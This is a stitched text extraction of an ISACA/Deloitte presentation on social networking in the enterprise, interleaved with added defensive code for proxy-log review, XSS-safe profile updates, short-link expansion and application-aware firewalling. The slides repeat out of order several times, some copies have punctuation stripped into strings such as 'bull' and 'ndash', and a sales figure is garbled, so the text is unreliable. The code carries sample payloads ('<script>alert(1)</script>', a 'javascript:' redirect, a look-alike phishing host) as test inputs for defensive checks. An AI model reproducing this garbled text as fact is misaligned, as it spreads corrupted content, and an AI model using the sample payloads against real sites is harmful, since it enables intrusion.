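    """Categorize by destination host name, never by port: a social site on
    443 or on a non-standard port is still the same application."""
    host = entry["host"]
    if domain_matches(host, SHORTENER_DOMAINS):
        return "shortener"
    if domain_matches(host, SOCIAL_DOMAINS):
        return "social"
    return "other"


def app_name(entry):
    """For Facebook platform apps the first path segment names the app
    (e.g. 'farmville'); otherwise None. Assumed URL layout for this example."""
    if entry["host"] != "apps.facebook.com":
        return None
    path = urlparse(entry["url"]).path.strip("/")
    return path.split("/")[0] if path else None


def summarize(log_text):
    """Per-user counts by category plus the named apps and shortened links seen,
    which is the data a reviewer needs to apply an acceptable-use policy."""
    report = defaultdict(lambda: {"social": 0, "shortener": 0, "other": 0,
                                  "apps": set(), "short_links": []})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        rec = report[entry["user"]]
        category = classify(entry)
        rec[category] += 1
        app = app_name(entry)
        if app:
            rec["apps"].add(app)
        if category == "shortener":
            rec["short_links"].append(entry["url"])
    return dict(report)


if __name__ == "__main__":
    for user, rec in sorted(summarize(SAMPLE_LOG).items()):
        print(user, rec)
```

Shortened links are listed rather than blocked here because the proxy only sees the shortener host; resolving the final destination (and checking it against a reputation feed) is a separate step that a next-generation firewall or a sandboxing proxy performs before the user lands on it.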
www.isaca.org 53
What is next in the world of social networking
www.isaca.org 54
Where we are today
• Enterprise social media has crossed the tipping point and is no longer considered an “emerging” technology
“The Hype Cycle” http://en.wikipedia.org/wiki/Hype_cycle
www.isaca.org 55
What's next in the world of social networking
• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, an increase of more than 400% on the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them.
www.isaca.org 56
Some further predictions
• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… Something important that has the potential to change the world, though we have a long way to go” — Biz Stone, Co-founder of Twitter
www.isaca.org 57
Q&A
www.isaca.org 58
Today's Presenters
Nelson Gibbs, Senior Manager, AERS – Audit & Enterprise Risk Services, Deloitte & Touche LLP, ngibbs@deloitte.com, +1 213 593 4241
www.isaca.org 59
Appendix
• Additional resources
  – Gopal, Raj et al., “Web 2.0 reinvents corporate networking”, Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009) — http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
www.isaca.org 60
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax, or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
www.isaca.org 26
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com
www.isaca.org 27
Foster creativity, innovation and collaboration (cont.)
• Deloitte's DStreet
  – Enterprise talent networking site - changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
As used in this document, “Deloitte” means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
www.isaca.org 28
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allow customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provide a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
www.isaca.org 29
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the “Yahoo Health” section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
www.isaca.org 30
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
www.isaca.org 31
Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
www.isaca.org 32
Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
www.isaca.org 33
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
www.isaca.org 34
Risks and challenges
www.isaca.org 35
Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications
    • Source - http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                    Monthly Active Users
1     FarmVille               82,580,911
2     Static FBML             46,827,021
3     Birthday Cards          41,904,049
4     Café World              30,032,716
5     Facebook for iPhone     29,438,848
6     Texas HoldEm Poker      28,332,917
7     Slide FunSpace          25,630,033
8     Happy Aquarium (BETA)   24,915,971
9     Mafia Wars              24,704,179
10    Causes                  24,317,292
www.isaca.org 36
Risks and challenges (cont.)
• New security concerns and attack vectors — as a result of the shift in technology toward Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML (“AJAX”) and Rich Internet Application (“RIA”) clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting (“CSS”) in AJAX, e.g. “Samy worm that exploited MySpace.com's CSS flaw”
  – XML poisoning — poison XML blocks coming from AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScripts into the RSS feeds to generate attack on client browser
  – Web Services Definition Language (“WSDL”) scanning and enumeration
  – Client-side validation in AJAX routines — fail to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
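Several of the vectors listed above (client-side validation with no server-side checks, script injected into profile content as in the Samy worm, requests replayed with the victim's cookies) come down to a server that trusts whatever the AJAX client sends. The Python below is an added example of the server-side half of a profile-update endpoint; it is not code from the presentation or from the Net-Square paper. The in-memory session store, the X-CSRF-Token header name, the field names and the length limit are assumptions made for this example.

```python
import hmac
import html
import json
import re

MAX_ABOUT_ME = 500

# Constructed session store for the example: session cookie -> user and CSRF token.
# A real service would keep this server-side in its session backend.
SESSIONS = {"sid-alice": {"user": "alice", "csrf": "tok-alice-123"}}


class RejectedRequest(Exception):
    """Raised for any request the server refuses; the message is safe to return."""


def authenticate(cookies, headers):
    """Resolve the session cookie and require a matching anti-CSRF token header.
    A cross-site page can make the browser send the cookie but cannot read the
    token, so a request that arrives without the right token is refused."""
    sess = SESSIONS.get(cookies.get("session"))
    if sess is None:
        raise RejectedRequest("no valid session")
    token = headers.get("X-CSRF-Token", "")
    if not hmac.compare_digest(token, sess["csrf"]):
        raise RejectedRequest("missing or wrong CSRF token")
    return sess["user"]


def validate_profile(payload):
    """Server-side checks on the JSON body. Whatever the client claims
    (such as a 'validated' flag set by its own JavaScript) is ignored."""
    try:
        body = json.loads(payload)
    except ValueError:
        raise RejectedRequest("body is not JSON")
    if not isinstance(body, dict) or set(body) - {"about_me", "validated"}:
        raise RejectedRequest("unexpected fields")
    about = body.get("about_me")
    if not isinstance(about, str):
        raise RejectedRequest("about_me must be a string")
    if len(about) > MAX_ABOUT_ME:
        raise RejectedRequest("about_me too long")
    if re.search(r"[\x00-\x08\x0b\x0c\x0e-\x1f]", about):
        raise RejectedRequest("control characters not allowed")
    return about


def render_fragment(user, about):
    """Build the HTML fragment the AJAX client will insert into the page.
    Every untrusted value is HTML-escaped, so markup in the data is displayed
    as text rather than executed by other users' browsers."""
    return '<div class="about" data-user="%s">%s</div>' % (
        html.escape(user, quote=True),
        html.escape(about, quote=True),
    )


def handle_update(cookies, headers, payload):
    """Full request path for the endpoint. Returns (status, body)."""
    try:
        user = authenticate(cookies, headers)
        about = validate_profile(payload)
    except RejectedRequest as e:
        return 400, str(e)
    return 200, render_fragment(user, about)


if __name__ == "__main__":
    # Constructed request: the client claims it validated the input, and the
    # input contains a script tag. The server still escapes it.
    print(handle_update({"session": "sid-alice"}, {"X-CSRF-Token": "tok-alice-123"},
                        '{"about_me": "<script>alert(1)</script>", "validated": true}'))
```

Escaping at render time is what stops a stored script in profile data from running in other users' browsers; rejecting unknown fields stops parameter manipulation from reaching code that was not written to expect them; the token check is what makes a replayed or forged request fail even though the browser attaches the session cookie automatically.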
www.isaca.org 37
Risks and challenges (cont.)
• Example worms/phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction - Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
www.isaca.org 38
Risks and challenges (cont.)
  – Boface - convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends.
• Common element – they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
www.isaca.org 37

Risks and challenges (cont.)

• Example worms and phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe; a worm is downloaded to the PC, which then looks for personal data
  – Fbaction – a Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account

www.isaca.org 38

Risks and challenges (cont.)

  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download completes, the user's Facebook account is hijacked and used to spam (and propagate the worm to) all of their friends
• Common element – they all take advantage of the implied trust that social networking users have in each other
www.isaca.org 39

Risks and challenges (cont.)

"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008

• Trust — data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are only starting to appear, often as plug-ins for social media tools
• Attacks may also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc. – which hides the real destination from the user until the link is followed
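One practical control the shortening bullet implies but does not spell out is to expand a short link without visiting the destination. Below is an added example written for this page, not code from the deck or from any shortener's API. It follows the redirect chain one hop at a time under a hop limit, refuses non-HTTP schemes, and then judges the final host. The injected headRequest function stands in for an HTTP HEAD issued with redirects disabled; FAKE_REDIRECTS, the shortener and trusted host lists and the look-alike host are all constructed for the example so that it runs offline.

```javascript
// Added example for this page; not from the ISACA/Deloitte deck. The redirect
// table, host lists and function names are constructed for the example.

const SHORTENER_HOSTS = new Set(['bit.ly', 'tr.im', 'tinyurl.com', 't.co']);
const MAX_HOPS = 5;

// Follow a short link one redirect at a time without executing anything at the
// destination. headRequest(url) stands in for an HTTP HEAD with redirects
// disabled and returns { status, location? }.
function expandShortUrl(startUrl, headRequest) {
  const chain = [startUrl];
  let current = startUrl;
  for (let hop = 0; hop < MAX_HOPS; hop++) {
    const parsed = new URL(current);
    if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
      return { chain, final: current, verdict: 'non-http scheme' };
    }
    const resp = headRequest(current);
    if (resp.status < 300 || resp.status >= 400 || !resp.location) {
      return { chain, final: current, verdict: 'resolved' };
    }
    // Location may be relative; resolve it against the URL that sent it.
    current = new URL(resp.location, current).toString();
    chain.push(current);
  }
  return { chain, final: current, verdict: 'too many redirects' };
}

// Judge the final destination. Chains that never leave a shortener, and hosts
// that embed a trusted brand as a prefix (facebook.com.example-login.net),
// are the patterns phishing on social networks relies on.
function assessDestination(result, trustedHosts) {
  if (result.verdict !== 'resolved') return 'block: ' + result.verdict;
  const host = new URL(result.final).hostname.toLowerCase();
  if (SHORTENER_HOSTS.has(host)) return 'block: still a shortener';
  if (trustedHosts.has(host)) return 'allow';
  for (const trusted of trustedHosts) {
    if (host.includes(trusted) && !host.endsWith('.' + trusted)) {
      return 'block: look-alike of ' + trusted;
    }
  }
  return 'review: ' + host;
}

// Constructed stand-in for real HEAD responses.
const FAKE_REDIRECTS = {
  'http://bit.ly/abc123': { status: 301, location: 'http://tinyurl.com/xyz' },
  'http://tinyurl.com/xyz': { status: 302, location: 'https://facebook.com.example-login.net/update.exe' },
  'https://facebook.com.example-login.net/update.exe': { status: 200 },
  'http://bit.ly/loop': { status: 301, location: 'http://bit.ly/loop' },
  'http://bit.ly/js': { status: 302, location: 'javascript:alert(1)' },
  'http://bit.ly/good': { status: 301, location: 'https://www.example.com/page' },
  'https://www.example.com/page': { status: 200 },
};
function fakeHead(url) {
  return FAKE_REDIRECTS[url] || { status: 404 };
}

const TRUSTED = new Set(['facebook.com', 'www.facebook.com', 'www.example.com']);

function checkLink(url) {
  const result = expandShortUrl(url, fakeHead);
  return { chain: result.chain, decision: assessDestination(result, TRUSTED) };
}

for (const u of ['http://bit.ly/abc123', 'http://bit.ly/loop', 'http://bit.ly/js', 'http://bit.ly/good']) {
  console.log(u, '->', checkLink(u).decision);
}
```

The look-alike test is a substring check and will flag some legitimate hosts that happen to contain a brand name; it is meant to route links to review, not to be the only control. In a real deployment the HEAD request should also carry no cookies and a short timeout, since the expansion itself is a request to an attacker-chosen server.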
www.isaca.org 40

Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment

www.isaca.org 41

Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment (cont.)

"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School: my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year…" – See http://www.419legal.org for more details

• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
www.isaca.org 42

Risks and challenges (cont.)

• Reputation — damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they are unaware of the promotions or offers being publicized
• Copyright violation — third-party material such as essays, articles and photographs is used without written consent from the owner
• Intellectual property theft — inadvertent data leakage is harder to prevent because of the one-to-many nature of Web 2.0 as a medium
www.isaca.org 43

Risks and challenges (cont.)

• Failures in the use of social media — most companies that use social media don't approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail

"Fully half of all Social Media investments will fail" — Gartner

www.isaca.org 44

Risks and challenges (cont.)

"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster Sings Chocolate Rain' about 1000 times." – Michael Scott, from The Office

• Productivity — users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
  http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org 45

Risks and challenges (cont.)

• Technical integration — most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – "Sign in using your account with…" — a growing list of third-party identity providers, each of which becomes a trust dependency for the application:
    • Facebook
    • Twitter
    • MySpace
    • Yahoo
    • Google
    • Windows Live ID
    • AOL
    • Blogger
    • WordPress
    • Netlog
    • OpenID
    • flickr

www.isaca.org 46

Risks and challenges (cont.)

• Information hoarding — in many industries value is placed on what an employee knows that others do not. This belief prevents data sharing
• Quantification — researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all"
  Or alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law

www.isaca.org 47

Risks and challenges (cont.)

• Litigation issues — discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation
www.isaca.org 48

A quick word on privacy

"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.

www.isaca.org 49

A quick word on privacy (cont.)

• Loss of Fourth Amendment protection once data is held by a third party
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence — only limited attempts to address it (deleted content may persist on the provider's systems)
www.isaca.org 50

Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications may be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how that information might become vulnerable and how to protect it (data mapping)

www.isaca.org 51

Responding to the risks and challenges (cont.)

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
www.isaca.org 52

Responding to the risks and challenges (cont.)

• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 and 443, alongside all other web traffic, so a port-based rule cannot single them out
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
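What "identify applications regardless of port" buys you is easiest to see in code. The following is an added example written for this page, not from the deck and not any firewall vendor's implementation: a port-based rule and an application-aware rule applied to the same constructed flow records. Application identification here is the simplest real form, matching the TLS SNI or HTTP Host name against a signature list; the signatures, the policy table, the flow records and the function names are all assumptions made for the example. It also separates facebook.com from apps.facebook.com, where the FarmVille and Mafia Wars traffic from the "Farmers and Mobsters" slide goes, so the "granular control" bullet becomes concrete.

```javascript
// Added example for this page; not from the ISACA/Deloitte deck and not any
// vendor's implementation. Signatures, policy and flow records are constructed.

// Host-name signatures, most specific first. Real NGFWs add protocol
// decoding and heuristics; SNI/Host matching is the minimal version.
const APP_SIGNATURES = [
  { app: 'facebook-apps', hosts: ['apps.facebook.com'] },
  { app: 'facebook',      hosts: ['facebook.com', 'fbcdn.net'] },
  { app: 'twitter',       hosts: ['twitter.com', 'twimg.com'] },
  { app: 'linkedin',      hosts: ['linkedin.com'] },
];

// Exact match or a proper subdomain; "evilfacebook.com" does not match.
function hostMatches(name, pattern) {
  return name === pattern || name.endsWith('.' + pattern);
}

// Classify a flow by the name the client itself sent (TLS SNI on 443, HTTP
// Host header on 80), ignoring the destination port entirely.
function identifyApp(flow) {
  const name = (flow.sni || flow.host || '').toLowerCase();
  if (!name) return 'unknown';
  for (const sig of APP_SIGNATURES) {
    if (sig.hosts.some(p => hostMatches(name, p))) return sig.app;
  }
  return 'web-other';
}

// The legacy rule: allow the standard web ports, deny the rest.
function portPolicy(flow) {
  return flow.dstPort === 80 || flow.dstPort === 443 ? 'allow' : 'deny';
}

// The application-aware rule: the site is allowed, its third-party
// application platform is not, and traffic that cannot be identified is
// held for inspection rather than waved through.
const APP_POLICY = {
  'facebook-apps': 'deny',
  facebook: 'allow',
  twitter: 'allow',
  linkedin: 'allow',
  'web-other': 'allow',
  unknown: 'inspect',
};
function appPolicy(flow) {
  return APP_POLICY[identifyApp(flow)];
}

// Constructed flow records in the shape a proxy or NGFW log would give.
const FLOWS = [
  { user: 'alice', dstPort: 443,  sni: 'www.facebook.com' },
  { user: 'alice', dstPort: 443,  sni: 'apps.facebook.com' },
  { user: 'bob',   dstPort: 80,   host: 'twitter.com' },
  { user: 'carol', dstPort: 8443, sni: 'www.facebook.com' },
  { user: 'dave',  dstPort: 443 },
];

// Apply both rules to every flow and report where they disagree.
function compareRules(flows) {
  return flows.map(f => {
    const byPort = portPolicy(f);
    const byApp = appPolicy(f);
    return { user: f.user, dstPort: f.dstPort, app: identifyApp(f), byPort, byApp, differs: byPort !== byApp };
  });
}

console.table(compareRules(FLOWS));
```

Two caveats an assessor should carry into a firewall review: the SNI and Host names are supplied by the client, so a determined user can send a benign name to a colluding server, and a flow with no SNI at all (the "dave" record) is exactly the traffic a port-based rule silently allows. The example treats that as "inspect" rather than "allow" for that reason.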
www.isaca.org 53

What is next in the world of social networking

www.isaca.org 54

Where we are today

• Enterprise social media has crossed the tipping point and is no longer considered an "emerging" technology
  "The Hype Cycle" — http://en.wikipedia.org/wiki/Hype_cycle

www.isaca.org 55

What's next in the world of social networking

• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, more than 400% of the 2009 figure of 140 million (Source — eMarketer)
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them

www.isaca.org 56

Some further predictions

• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" — Mark Zuckerberg, Facebook founder
  – "(Twitter is)… something important that has the potential to change the world, though we have a long way to go" — Biz Stone, co-founder of Twitter

www.isaca.org 57

Q&A

www.isaca.org 58

Today's Presenters

Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg28
Enhance customer and partner relationships

• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become part of the new-offering development process

Revenue growth
• A major consumer goods company improved sales by 315 by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value

www.isaca.org 29

Enhance customer and partner relationships (cont.)

• Procter & Gamble
  – Capessa launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com

www.isaca.org 30

Enhance customer and partner relationships (cont.)

• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com

www.isaca.org 31

Enhance customer and partner relationships (cont.)

• Louisville, Kentucky
  – Interactive audit findings on the city's web site. Allows users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit

www.isaca.org 32

Enhance customer and partner relationships (cont.)

• Amazon
  – Shelfari, a social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com

www.isaca.org 33

Enhance customer and partner relationships (cont.)

• Bank of America (BofA)
  – On January 29, 2010, the Bank of America web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest updates
www.isaca.org 34

Risks and challenges

www.isaca.org 35

Risks and challenges

• Farmers and Mobsters
  – Top Facebook applications
    • Source – http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

